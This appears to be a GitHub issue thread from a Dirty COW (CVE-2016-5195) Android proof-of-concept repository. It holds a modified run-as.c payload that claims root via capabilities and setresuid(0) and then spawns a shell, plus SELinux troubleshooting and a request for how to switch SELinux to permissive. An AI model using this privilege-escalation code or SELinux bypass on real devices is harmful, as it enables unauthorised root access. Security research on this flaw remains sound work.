timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

Problem with Run-as #17

Closed. ghost closed this issue 7 years ago.

ghost commented 8 years ago

Hello, I've tried to exploit root access with dirtycow, and I've modified the file run-as.c to launch a system command with the function system(), but it doesn't work. Here is the code:

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>          /* memset, strerror */
#include <errno.h>           /* errno */
#include <sys/capability.h>

int main(int argc, char **argv)
{
  struct __user_cap_header_struct capheader;
  struct __user_cap_data_struct capdata[2];

  /* Request CAP_SETUID and CAP_SETGID in both the effective and permitted
     sets so that the setresgid/setresuid calls below are allowed. */
  memset(&capheader, 0, sizeof(capheader));
  memset(&capdata, 0, sizeof(capdata));
  capheader.version = _LINUX_CAPABILITY_VERSION_3;
  capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
  capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
  capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
  if (capset(&capheader, &capdata[0]) < 0) {
    printf("Could not set capabilities: %s\n", strerror(errno));
  }

  /* Switch real, effective and saved uid/gid to 0. */
  if(setresgid(0,0,0) || setresuid(0,0,0)) {
    printf("setresgid/setresuid failed\n");
  }

  if(getuid() != 0){
    printf("Failed to obtain root access. \n");
    exit(1);
  }
  printf("SUCCESSFUL!!\n");
  /* Modified part: run the commands through system() instead of exec'ing
     a shell directly. The return values are not checked here. */
  system("/system/bin/id");
  system("/system/bin/sh");
  return 0;
}

Here is the output:

shell@HWLYO-L6735:/data/local/tmp $ run-as
WARNING: linker: run-as: unused DT entry: type 0x6ffffffe arg 0x53c
WARNING: linker: run-as: unused DT entry: type 0x6fffffff arg 0x1
SUCCESSFUL!!

Do you have any idea? Thank you in advance for your answer.

joel0 commented 8 years ago

SELinux is the problem. run-as is jailed in a way that you can't use system() like that. If you check the return value of the call, I expect you will see some sort of access-denied error.

See https://github.com/timwr/CVE-2016-5195/issues/9 for more discussion on the topic.
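The advice above is to check what system() actually returns. The following is an added example, not code from the timwr/CVE-2016-5195 repository or from either commenter. system() does not hand back the command's output; it returns a wait status that has to be decoded with the W* macros. When the SELinux policy confining the run-as domain stops the shell from exec'ing the target, the shell exits with 126 or 127, and when the shell itself cannot be started the child of system() exits with 127, so a caller that ignores the status sees nothing. The helper also reads /proc/self/attr/current, which holds the SELinux context of the calling process, and /sys/fs/selinux/enforce. The commands and paths in main() assume a desktop Linux host with /bin/sh; on the device they would be /system/bin/id and /system/bin/sh.

```c
/* Added example: make a silent system() failure visible. Not part of the
 * original run-as.c. Assumes a POSIX host with /bin/sh. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>

/* Run cmd via system() and decode the wait status.
 * Returns the child's exit code (0..255), 128+signal if it was killed,
 * or -1 if system() itself failed (fork failed). A one-line diagnosis is
 * written to stderr for anything other than a clean exit 0. */
int run_checked(const char *cmd)
{
    errno = 0;
    int st = system(cmd);
    if (st == -1) {
        fprintf(stderr, "system(\"%s\"): %s\n", cmd, strerror(errno));
        return -1;
    }
    if (WIFEXITED(st)) {
        int code = WEXITSTATUS(st);
        if (code == 126 || code == 127)
            fprintf(stderr, "\"%s\": shell could not start or exec the "
                            "command (exit %d); check SELinux denials\n",
                    cmd, code);
        else if (code != 0)
            fprintf(stderr, "\"%s\": exited with %d\n", cmd, code);
        return code;
    }
    if (WIFSIGNALED(st)) {
        fprintf(stderr, "\"%s\": killed by signal %d\n", cmd, WTERMSIG(st));
        return 128 + WTERMSIG(st);
    }
    return -1;
}

/* Read a small pseudo-file such as /proc/self/attr/current into buf.
 * Returns the number of bytes kept, or -1 if the file cannot be opened
 * (no SELinux on this kernel, or no permission to read it). */
int read_attr(const char *path, char *buf, size_t len)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, len - 1, f);
    fclose(f);
    buf[n] = '\0';
    /* Drop the trailing newline or NUL the kernel appends. */
    while (n > 0 && (buf[n - 1] == '\n' || buf[n - 1] == '\0'))
        buf[--n] = '\0';
    return (int)n;
}

int main(void)
{
    char ctx[256];
    if (read_attr("/proc/self/attr/current", ctx, sizeof ctx) > 0)
        printf("SELinux context: %s\n", ctx);
    else
        printf("SELinux context: unavailable\n");
    if (read_attr("/sys/fs/selinux/enforce", ctx, sizeof ctx) > 0)
        printf("enforcing: %s\n", ctx);

    /* On the device these would be /system/bin/id and /system/bin/sh. */
    run_checked("id");
    run_checked("/this/path/does/not/exist");
    return 0;
}
```

Run it from the same run-as context that printed "SUCCESSFUL" and the diagnosis line tells you whether the shell ran at all; the context line tells you which SELinux domain the policy is applying to the process.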

ghost commented 8 years ago

How can I put SELinux into permissive mode?

timwr commented 7 years ago

See #9